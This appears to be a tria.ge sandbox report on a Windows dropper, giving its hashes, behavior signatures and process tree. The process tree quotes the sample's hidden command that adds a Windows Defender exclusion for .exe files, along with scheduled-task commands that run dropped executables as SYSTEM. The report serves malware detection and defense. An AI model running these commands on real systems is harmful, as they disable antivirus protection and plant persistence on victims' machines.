Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
11/04/2024, 17:02
Static task
static1
Behavioral task
behavioral1
Sample
a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe
Resource
win10v2004-20240226-en
General
-
Target
a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe
-
Size
6.5MB
-
MD5
750872686fc2c616861c93b2f9132d5e
-
SHA1
d27bf0db81fb395fe3d6ace1c74c90e1c776a853
-
SHA256
a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b
-
SHA512
afef9999f91c831220df465a9174be5f80c8d1fe2996312845a59a73a8c18936e60f5520cfdf9fc16cf5ba96ba75ea77d31e07aedb68af06df9cab3bc093ea25
-
SSDEEP
98304:91O9tCheY8CeaL3od2rNGNdMdSa1zJTH4DcftNHjoIpH:91O9UheY8CLodwGNOdSa7MsoI9
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 72 1880 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation ItpoQEL.exe -
Executes dropped EXE 3 IoCs
pid Process 2500 Install.exe 3600 tpkiZVq.exe 4304 ItpoQEL.exe -
Loads dropped DLL 1 IoCs
pid Process 1880 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json ItpoQEL.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json ItpoQEL.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini ItpoQEL.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 ItpoQEL.exe File created C:\Windows\system32\GroupPolicy\gpt.ini tpkiZVq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 ItpoQEL.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ItpoQEL.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol tpkiZVq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 ItpoQEL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 ItpoQEL.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ItpoQEL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ItpoQEL.exe File created C:\Program Files (x86)\eBaLNwdfBoAU2\xcwGnuu.xml ItpoQEL.exe File created C:\Program Files (x86)\VQnigEewLHUn\dJNddcU.dll ItpoQEL.exe File created C:\Program Files (x86)\CsUgOGApU\lnVxuW.dll ItpoQEL.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ItpoQEL.exe File created C:\Program Files (x86)\eBaLNwdfBoAU2\YlTnkVRxYuAWz.dll ItpoQEL.exe File created C:\Program Files (x86)\feaAGXZTPHSTZufvckR\ddcXWUT.dll ItpoQEL.exe File created C:\Program Files (x86)\YXRVthYkCAsAC\McnNYQE.xml ItpoQEL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ItpoQEL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ItpoQEL.exe File created C:\Program Files (x86)\CsUgOGApU\CtbBkhG.xml ItpoQEL.exe File created C:\Program Files (x86)\feaAGXZTPHSTZufvckR\OLbrNxw.xml ItpoQEL.exe File created C:\Program Files (x86)\YXRVthYkCAsAC\WSDEVlS.dll ItpoQEL.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bHNJINcAmGBfsLXkXG.job schtasks.exe File created C:\Windows\Tasks\TVsECgUtwDhLZifMW.job schtasks.exe File created C:\Windows\Tasks\jHYEWeDFllXYdol.job schtasks.exe File created C:\Windows\Tasks\IypqguOSOyxhMfXuI.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2308 schtasks.exe 4392 schtasks.exe 5076 schtasks.exe 2336 schtasks.exe 3752 schtasks.exe 4280 schtasks.exe 3520 schtasks.exe 4092 schtasks.exe 4256 schtasks.exe 3584 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2dcc6a48-0000-0000-0000-d01200000000} ItpoQEL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer tpkiZVq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ItpoQEL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2dcc6a48-0000-0000-0000-d01200000000}\MaxCapacity = "14116" ItpoQEL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "5" tpkiZVq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ItpoQEL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ItpoQEL.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2dcc6a48-0000-0000-0000-d01200000000}\NukeOnDelete = "0" ItpoQEL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket ItpoQEL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2196 powershell.exe 2196 powershell.exe 2264 powershell.exe 2264 powershell.exe 64 powershell.exe 64 powershell.exe 1988 powershell.EXE 1988 powershell.EXE 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4336 powershell.exe 4336 powershell.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe 4304 ItpoQEL.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2196 powershell.exe Token: SeIncreaseQuotaPrivilege 64 WMIC.exe Token: SeSecurityPrivilege 64 WMIC.exe Token: SeTakeOwnershipPrivilege 64 WMIC.exe Token: SeLoadDriverPrivilege 64 WMIC.exe Token: SeSystemProfilePrivilege 64 WMIC.exe Token: SeSystemtimePrivilege 64 WMIC.exe Token: SeProfSingleProcessPrivilege 64 WMIC.exe Token: SeIncBasePriorityPrivilege 64 WMIC.exe Token: SeCreatePagefilePrivilege 64 WMIC.exe Token: SeBackupPrivilege 64 WMIC.exe Token: SeRestorePrivilege 64 WMIC.exe Token: SeShutdownPrivilege 64 WMIC.exe Token: SeDebugPrivilege 64 WMIC.exe Token: SeSystemEnvironmentPrivilege 64 WMIC.exe Token: SeRemoteShutdownPrivilege 64 WMIC.exe Token: SeUndockPrivilege 64 WMIC.exe Token: SeManageVolumePrivilege 64 WMIC.exe Token: 33 64 WMIC.exe Token: 34 64 WMIC.exe Token: 35 64 WMIC.exe Token: 36 64 WMIC.exe Token: SeIncreaseQuotaPrivilege 64 WMIC.exe Token: SeSecurityPrivilege 64 WMIC.exe Token: SeTakeOwnershipPrivilege 64 WMIC.exe Token: SeLoadDriverPrivilege 64 WMIC.exe Token: SeSystemProfilePrivilege 64 WMIC.exe Token: SeSystemtimePrivilege 64 WMIC.exe Token: SeProfSingleProcessPrivilege 64 WMIC.exe Token: SeIncBasePriorityPrivilege 64 WMIC.exe Token: SeCreatePagefilePrivilege 64 WMIC.exe Token: SeBackupPrivilege 64 WMIC.exe Token: SeRestorePrivilege 64 WMIC.exe Token: SeShutdownPrivilege 64 WMIC.exe Token: SeDebugPrivilege 64 WMIC.exe Token: SeSystemEnvironmentPrivilege 64 WMIC.exe Token: SeRemoteShutdownPrivilege 64 WMIC.exe Token: SeUndockPrivilege 64 WMIC.exe Token: SeManageVolumePrivilege 64 WMIC.exe Token: 33 64 WMIC.exe Token: 34 64 WMIC.exe Token: 35 64 WMIC.exe Token: 36 64 WMIC.exe Token: SeDebugPrivilege 2264 powershell.exe Token: SeDebugPrivilege 64 powershell.exe Token: SeDebugPrivilege 1988 powershell.EXE Token: SeDebugPrivilege 4336 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3292 WMIC.exe Token: SeIncreaseQuotaPrivilege 3292 WMIC.exe Token: SeSecurityPrivilege 3292 WMIC.exe Token: SeTakeOwnershipPrivilege 3292 WMIC.exe Token: SeLoadDriverPrivilege 3292 WMIC.exe Token: SeSystemtimePrivilege 3292 WMIC.exe Token: SeBackupPrivilege 3292 WMIC.exe Token: SeRestorePrivilege 3292 WMIC.exe Token: SeShutdownPrivilege 3292 WMIC.exe Token: SeSystemEnvironmentPrivilege 3292 WMIC.exe Token: SeUndockPrivilege 3292 WMIC.exe Token: SeManageVolumePrivilege 3292 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 3292 WMIC.exe Token: SeIncreaseQuotaPrivilege 3292 WMIC.exe Token: SeSecurityPrivilege 3292 WMIC.exe Token: SeTakeOwnershipPrivilege 3292 WMIC.exe Token: SeLoadDriverPrivilege 3292 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5100 wrote to memory of 2500 5100 a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe 84 PID 5100 wrote to memory of 2500 5100 a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe 84 PID 5100 wrote to memory of 2500 5100 a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe 84 PID 2500 wrote to memory of 2532 2500 Install.exe 86 PID 2500 wrote to memory of 2532 2500 Install.exe 86 PID 2500 wrote to memory of 2532 2500 Install.exe 86 PID 2532 wrote to memory of 4144 2532 forfiles.exe 88 PID 2532 wrote to memory of 4144 2532 forfiles.exe 88 PID 2532 wrote to memory of 4144 2532 forfiles.exe 88 PID 4144 wrote to memory of 2196 4144 cmd.exe 89 PID 4144 wrote to memory of 2196 4144 cmd.exe 89 PID 4144 wrote to memory of 2196 4144 cmd.exe 89 PID 2196 wrote to memory of 64 2196 powershell.exe 90 PID 2196 wrote to memory of 64 2196 powershell.exe 90 PID 2196 wrote to memory of 64 2196 powershell.exe 90 PID 2500 wrote to memory of 3520 2500 Install.exe 94 PID 2500 wrote to memory of 3520 2500 Install.exe 94 PID 2500 wrote to memory of 3520 2500 Install.exe 94 PID 3600 wrote to memory of 2264 3600 tpkiZVq.exe 102 PID 3600 wrote to memory of 2264 3600 tpkiZVq.exe 102 PID 3600 wrote to memory of 2264 3600 tpkiZVq.exe 102 PID 2264 wrote to memory of 4056 2264 powershell.exe 104 PID 2264 wrote to memory of 4056 2264 powershell.exe 104 PID 2264 wrote to memory of 4056 2264 powershell.exe 104 PID 4056 wrote to memory of 980 4056 cmd.exe 105 PID 4056 wrote to memory of 980 4056 cmd.exe 105 PID 4056 wrote to memory of 980 4056 cmd.exe 105 PID 2264 wrote to memory of 3080 2264 powershell.exe 106 PID 2264 wrote to memory of 3080 2264 powershell.exe 106 PID 2264 wrote to memory of 3080 2264 powershell.exe 106 PID 2264 wrote to memory of 2856 2264 powershell.exe 107 PID 2264 wrote to memory of 2856 2264 powershell.exe 107 PID 2264 wrote to memory of 2856 2264 powershell.exe 107 PID 2264 wrote to memory of 4428 2264 powershell.exe 108 PID 2264 wrote to memory of 4428 2264 powershell.exe 108 PID 2264 wrote to memory of 4428 2264 powershell.exe 108 PID 2264 wrote to memory of 3284 2264 powershell.exe 109 PID 2264 wrote to memory of 3284 2264 powershell.exe 109 PID 2264 wrote to memory of 3284 2264 powershell.exe 109 PID 2264 wrote to memory of 5076 2264 powershell.exe 110 PID 2264 wrote to memory of 5076 2264 powershell.exe 110 PID 2264 wrote to memory of 5076 2264 powershell.exe 110 PID 2264 wrote to memory of 1780 2264 powershell.exe 111 PID 2264 wrote to memory of 1780 2264 powershell.exe 111 PID 2264 wrote to memory of 1780 2264 powershell.exe 111 PID 2264 wrote to memory of 4792 2264 powershell.exe 112 PID 2264 wrote to memory of 4792 2264 powershell.exe 112 PID 2264 wrote to memory of 4792 2264 powershell.exe 112 PID 2264 wrote to memory of 5048 2264 powershell.exe 113 PID 2264 wrote to memory of 5048 2264 powershell.exe 113 PID 2264 wrote to memory of 5048 2264 powershell.exe 113 PID 2264 wrote to memory of 3736 2264 powershell.exe 114 PID 2264 wrote to memory of 3736 2264 powershell.exe 114 PID 2264 wrote to memory of 3736 2264 powershell.exe 114 PID 2264 wrote to memory of 1916 2264 powershell.exe 115 PID 2264 wrote to memory of 1916 2264 powershell.exe 115 PID 2264 wrote to memory of 1916 2264 powershell.exe 115 PID 2264 wrote to memory of 4156 2264 powershell.exe 116 PID 2264 wrote to memory of 4156 2264 powershell.exe 116 PID 2264 wrote to memory of 4156 2264 powershell.exe 116 PID 2264 wrote to memory of 3352 2264 powershell.exe 117 PID 2264 wrote to memory of 3352 2264 powershell.exe 117 PID 2264 wrote to memory of 3352 2264 powershell.exe 117 PID 2264 wrote to memory of 4456 2264 powershell.exe 118
Processes
-
C:\Users\Admin\AppData\Local\Temp\a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe"C:\Users\Admin\AppData\Local\Temp\a9fd71b65b54e892e1fa11eaecf332497ccab5a16504df13de05a6da20c2fe2b.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Users\Admin\AppData\Local\Temp\7zS32E7.tmp\Install.exe.\Install.exe /GdidBRgiK "385118" /S2⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:64
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bHNJINcAmGBfsLXkXG" /SC once /ST 17:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\seTWBfhrtkxFtxG\tpkiZVq.exe\" kg /xgsite_idLed 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3520
-
-
-
C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\seTWBfhrtkxFtxG\tpkiZVq.exeC:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\seTWBfhrtkxFtxG\tpkiZVq.exe kg /xgsite_idLed 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:3600 -
